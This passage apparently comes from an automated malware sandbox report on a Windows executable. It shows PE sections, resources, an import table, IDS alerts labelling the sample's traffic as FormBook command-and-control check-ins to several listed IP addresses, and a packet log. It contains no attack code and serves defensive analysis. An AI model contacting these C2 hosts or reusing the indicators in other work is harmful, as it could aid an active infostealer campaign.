                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                  .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-18T13:12:53.485931+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53115 | 47.76.213.197 | 80 | TCP
2024-11-18T13:13:09.437341+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53149 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:11.999199+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53150 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:14.530180+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53151 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:17.093699+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53152 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:23.094046+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53153 | 176.117.73.104 | 80 | TCP
2024-11-18T13:13:25.812830+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53154 | 176.117.73.104 | 80 | TCP
2024-11-18T13:13:28.640925+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53155 | 176.117.73.104 | 80 | TCP
2024-11-18T13:13:31.532538+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53156 | 176.117.73.104 | 80 | TCP
2024-11-18T13:13:37.411117+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53157 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:39.960092+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53158 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:42.463269+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53159 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:45.053482+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53160 | 13.248.169.48 | 80 | TCP
2024-11-18T13:13:51.201404+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53161 | 107.167.84.42 | 80 | TCP
2024-11-18T13:13:53.754465+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53162 | 107.167.84.42 | 80 | TCP
2024-11-18T13:13:56.424552+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53163 | 107.167.84.42 | 80 | TCP
2024-11-18T13:13:59.085864+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53164 | 107.167.84.42 | 80 | TCP
2024-11-18T13:14:05.141058+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53165 | 176.32.38.130 | 80 | TCP
2024-11-18T13:14:07.781687+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53166 | 176.32.38.130 | 80 | TCP
2024-11-18T13:14:10.517191+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53167 | 176.32.38.130 | 80 | TCP
2024-11-18T13:14:13.078566+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53168 | 176.32.38.130 | 80 | TCP
2024-11-18T13:14:19.154386+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53169 | 161.97.142.144 | 80 | TCP
2024-11-18T13:14:21.698796+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53170 | 161.97.142.144 | 80 | TCP
2024-11-18T13:14:24.360270+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53171 | 161.97.142.144 | 80 | TCP
2024-11-18T13:14:27.024295+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53172 | 161.97.142.144 | 80 | TCP
2024-11-18T13:14:33.633607+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53173 | 203.161.46.205 | 80 | TCP
2024-11-18T13:14:36.188442+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53174 | 203.161.46.205 | 80 | TCP
2024-11-18T13:14:38.756479+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53175 | 203.161.46.205 | 80 | TCP
2024-11-18T13:14:41.324493+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53176 | 203.161.46.205 | 80 | TCP
2024-11-18T13:14:48.594377+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53177 | 20.2.36.112 | 80 | TCP
2024-11-18T13:14:51.141237+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53178 | 20.2.36.112 | 80 | TCP
2024-11-18T13:14:53.656857+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 53179 | 20.2.36.112 | 80 | TCP
2024-11-18T13:14:56.235004+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 53180 | 20.2.36.112 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 13:12:52.453747034 CET | 53115 | 80 | 192.168.2.7 | 47.76.213.197
Nov 18, 2024 13:12:52.458596945 CET | 80 | 53115 | 47.76.213.197 | 192.168.2.7
Nov 18, 2024 13:12:52.458707094 CET | 53115 | 80 | 192.168.2.7 | 47.76.213.197
Nov 18, 2024 13:12:52.512556076 CET | 53115 | 80 | 192.168.2.7 | 47.76.213.197
Nov 18, 2024 13:12:52.517467976 CET | 80 | 53115 | 47.76.213.197 | 192.168.2.7
Nov 18, 2024 13:12:53.441814899 CET | 80 | 53115 | 47.76.213.197 | 192.168.2.7
Nov 18, 2024 13:12:53.485930920 CET | 53115 | 80 | 192.168.2.7 | 47.76.213.197
Nov 18, 2024 13:12:53.637706041 CET | 80 | 53115 | 47.76.213.197 | 192.168.2.7
Nov 18, 2024 13:12:53.637888908 CET | 53115 | 80 | 192.168.2.7 | 47.76.213.197
Nov 18, 2024 13:12:53.642390013 CET | 53115 | 80 | 192.168.2.7 | 47.76.213.197
Nov 18, 2024 13:12:53.647726059 CET | 80 | 53115 | 47.76.213.197 | 192.168.2.7
Nov 18, 2024 13:13:08.740921974 CET | 53149 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:08.745994091 CET | 80 | 53149 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:08.746154070 CET | 53149 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:08.760742903 CET | 53149 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:08.765774965 CET | 80 | 53149 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:09.437261105 CET | 80 | 53149 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:09.437340975 CET | 53149 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:10.266155958 CET | 53149 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:10.271307945 CET | 80 | 53149 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:11.292529106 CET | 53150 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:11.297595978 CET | 80 | 53150 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:11.297796965 CET | 53150 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:11.312334061 CET | 53150 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:11.317344904 CET | 80 | 53150 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:11.999111891 CET | 80 | 53150 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:11.999198914 CET | 53150 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:12.828701019 CET | 53150 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:12.833832026 CET | 80 | 53150 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:13.847521067 CET | 53151 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:13.852547884 CET | 80 | 53151 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:13.852653980 CET | 53151 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:13.867085934 CET | 53151 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:13.872143984 CET | 80 | 53151 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:13.872186899 CET | 80 | 53151 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:14.530010939 CET | 80 | 53151 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:14.530179977 CET | 53151 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:15.375399113 CET | 53151 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:15.380347013 CET | 80 | 53151 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:16.394114971 CET | 53152 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:16.399259090 CET | 80 | 53152 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:16.399386883 CET | 53152 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:16.408215046 CET | 53152 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:16.414262056 CET | 80 | 53152 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:17.060798883 CET | 80 | 53152 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:17.093553066 CET | 80 | 53152 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:17.093698978 CET | 53152 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:17.094763994 CET | 53152 | 80 | 192.168.2.7 | 13.248.169.48
Nov 18, 2024 13:13:17.101082087 CET | 80 | 53152 | 13.248.169.48 | 192.168.2.7
Nov 18, 2024 13:13:22.195954084 CET | 53153 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:22.200896978 CET | 80 | 53153 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:22.201041937 CET | 53153 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:22.397254944 CET | 53153 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:22.402333975 CET | 80 | 53153 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:23.041517973 CET | 80 | 53153 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:23.094046116 CET | 53153 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:23.161762953 CET | 80 | 53153 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:23.161833048 CET | 53153 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:23.906706095 CET | 53153 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:24.931166887 CET | 53154 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:24.936213017 CET | 80 | 53154 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:24.936342955 CET | 53154 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:24.992558002 CET | 53154 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:24.997539043 CET | 80 | 53154 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:25.766143084 CET | 80 | 53154 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:25.812829971 CET | 53154 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:26.172859907 CET | 80 | 53154 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:26.173041105 CET | 53154 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:26.173152924 CET | 80 | 53154 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:26.173226118 CET | 53154 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:26.500726938 CET | 53154 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:27.520338058 CET | 53155 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:27.757010937 CET | 80 | 53155 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:27.757116079 CET | 53155 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:27.777478933 CET | 53155 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:27.782413960 CET | 80 | 53155 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:27.782497883 CET | 80 | 53155 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:28.587275982 CET | 80 | 53155 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:28.640924931 CET | 53155 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:28.705878973 CET | 80 | 53155 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:28.706058025 CET | 53155 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:29.281758070 CET | 53155 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:30.303400040 CET | 53156 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:30.308568001 CET | 80 | 53156 | 176.117.73.104 | 192.168.2.7
Nov 18, 2024 13:13:30.308700085 CET | 53156 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:30.390229940 CET | 53156 | 80 | 192.168.2.7 | 176.117.73.104
Nov 18, 2024 13:13:30.395235062 CET | 80 | 53156 | 176.117.73.104 | 192.168.2.7
